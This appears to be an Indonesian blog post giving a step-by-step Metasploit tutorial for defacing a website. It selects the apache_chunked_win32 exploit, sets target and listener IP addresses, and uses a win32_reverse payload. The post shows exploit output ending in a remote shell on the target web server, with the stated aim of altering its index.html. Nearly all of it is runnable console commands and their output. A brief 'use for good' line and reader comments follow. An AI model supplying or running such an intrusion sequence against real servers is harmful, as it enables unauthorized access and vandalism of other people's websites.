Defacing Menggunakan Metasploit Di Bactrack


  1. Seperti biasa, masuk console aja. Next ketik msfconsole
    root@bt:/# msfconsole
  1. Setelah agak lama masuk juga di msfconsole, kemudian ketik show exploits
    msf > show exploits

    Metasploit Framework Loaded Exploits
    ====================================
    Credits Metasploit Framework Credits

    afp_loginext AppleFileServer LoginExt PathName Buffer Overflow
    apache_chunked_win32 Apache Win32 Chunked Encoding
    blackice_pam_icq ISS PAM.dll ICQ Parser Buffer Overflow
    distcc_exec DistCC Daemon Command Execution
    exchange2000_xexch50 Exchange 2000 MS03-46 Heap Overflow
    frontpage_fp30reg_chunked Frontpage fp30reg.dll Chunked Encoding
    ia_webmail IA WebMail 3.x Buffer Overflow
    iis50_nsiislog_post IIS 5.0 nsiislog.dll POST Overflow
    iis50_printer_overflow IIS 5.0 Printer Buffer Overflow
    iis50_webdav_ntdll IIS 5.0 WebDAV ntdll.dll Overflow


    Jadi disini kita bisa melihat daftar exploit pada Metasploit. salah satu yang akan kita gunakan adalah exploit nomor 2 dari atas, yakni: apache_chunked_win32
  2. Lanjut dengan pake salah satu exploit diatas 
    msf > use apache_chunked_win32
    msf apache_chunked_win32 >
  3. Sebagaimana yang terlihat pada prompt akan berubah menjadi msf apache_chunked_win32>dengan prompt ini kita dapat melihat berbagai opsi exploit jenis ini, silakan ketik perintah dibawah ini:
    msf apache_chunked_win32 > show options

    Exploit Options
    ===============
    Exploit: Name Default Description
    -------- ------ ------- ------------------
    optional SSL Use SSL
    required RHOST The target address
    required RPORT 80 The target port
    Target: Windows NT/2K Brute Force

    msf apache_chunked_win32 >
  4. Sekarang kita balik ke prompt semula, dan daftar opsi yang kita perlu isi seperti remote host IP address target, seperti contoh dibawah ini :
    msf apache_chunked_win32 > set RHOST 192.168.1.101
    RHOST -> 192.168.1.101
    msf apache_chunked_win32 >
  5. Disini kita dapat melihat berbagai opsi yang kita perlukan sebelum menggunakan exploit ini guna mendapatkan akses tingkat sistem. Dalam kasus ini saya menggunakan perintah berikut untuk melihat apakah opsi payloads bisa digunakan?

    msf apache_chunked_win32 > show payloads

    Metasploit Framework Usable Payloads
    ====================================
    win32_bind Windows Bind Shell
    win32_bind_dllinject Windows Bind DLL Inject
    win32_bind_stg Windows Staged Bind Shell
    win32_bind_stg_upexec Windows Staged Bind Upload/Execute
    win32_bind_vncinject Windows Bind VNC Server DLL Inject
    win32_reverse Windows Reverse Shell
    win32_reverse_dllinject Windows Reverse DLL Inject
    win32_reverse_stg Windows Staged Reverse Shell
    win32_reverse_stg_ie Windows Reverse InlineEgg Stager
    win32_reverse_stg_upexec Windows Staged Reverse Upload/Execute
    win32_reverse_vncinject Windows Reverse VNC Server DLL Inject
    msf apache_chunked_win32 >


    Opsi ini merupakan bagian dari Metasploit Framework, yang memungkinkan anda menggunakan “egg” apapun yang anda pilih. Egg disini adalah apapun payload yang akan anda eksekusi pada komputer korban. Pilihan ini merupakan hal umum dalam penggunaan security tool.
  6. Dari apa yang kita lihat diatas ada suatu kelebihan dari opsi yang ada pada kami. Dalam kasus ini kita akan menggunakan win32_reverse payload. Mengapa? baiklah kita menginginkan shell yang bisa kita gunakan untuk mengangkut materi bolak-balik. Tepatnya kita ingin meng-copy file index.html, dan membuat beberapa modifikasi alias Deface. Hanya dengan shell itulah kita dapat melakukannya. Harap diperhatikan bahwa kita perlu memberitahu Framework tersebut bahwa kita ingin opsi payload tersebut. Berikut ini syntax-nya:

    msf apache_chunked_win32 > set PAYLOAD win32_reverse
    PAYLOAD -> win32_reverse
    msf apache_chunked_win32(win32_reverse) >
  7. Jadi kita sekarang telah menentukan payload dan telah menjadi prompt dibelakangnya. Apa selanjutnya? Hmm… kita perlu menentukan IP address untuk menerima reverse shell tersebut. Ingatlah kembali beberapa langkah sebelumnya saat kita mengeset RHOST untuk menentukan mesin korban? Kita juga perlu melakukan hal yang sama untuk menentukan receiving host. Silakan lihat perintahnya dibawah ini:

    msf apache_chunked_win32(win32_reverse) > set LHOST 192.168.1.102
    LHOST -> 192.168.1.102
    msf apache_chunked_win32(win32_reverse) >
  8. Sekarang saatnya kita menjalankan exploit. Syntaknya adalah sebagai berikut:

    msf apache_chunked_win32(win32_reverse) > exploit 192.168.1.101
    Starting Reverse Handler.
    Trying to exploit Windows 2000 using return 0x1c0f143c with padding of 348...
    Trying to exploit Windows NT using return 0x1c0f1022 with padding of 348...
    Trying to exploit Windows 2000 using return 0x1c0f143c with padding of 352...
    Trying to exploit Windows NT using return 0x1c0f1022 with padding of 352...
    Trying to exploit Windows 2000 using return 0x1c0f143c with padding of 356...
    Trying to exploit Windows NT using return 0x1c0f1022 with padding of 356...
    Trying to exploit Windows 2000 using return 0x1c0f143c with padding of 360...
    Got connection from 192.168.1.101:1031
     
    Microsoft Windows 2000 [Version 5.00.2195]
    (C) Copyright 1985-2000 Microsoft Corp.

    C:\Program Files\Apache Group\Apache>
  9. Nah Kita sudah Masuk tuh Ke shell webservernya target........
    kita mau apain aja terserah.....


    Gunakan Pelajaran ini untuk kebaikan,,,,bukan untuk keisengan,kebencian ataupun kesenangan,,,,!!!

2 komentar:

riyan08 mengatakan...

wahhhh ajib ajib :D,,, salam kenal...
jangan lupa kungjungi juga ... www.iyanboo.blogspot.com

Izza009 mengatakan...

klo dah gitu,trus diapain???

yang jelas dong mbak..

yang detail.
insyaallah beranfaat.

Posting Komentar

 
Free Website templatesfreethemes4all.comFree Blog TemplatesLast NewsFree CMS TemplatesFree CSS TemplatesFree Soccer VideosFree Wordpress ThemesFree Web Templates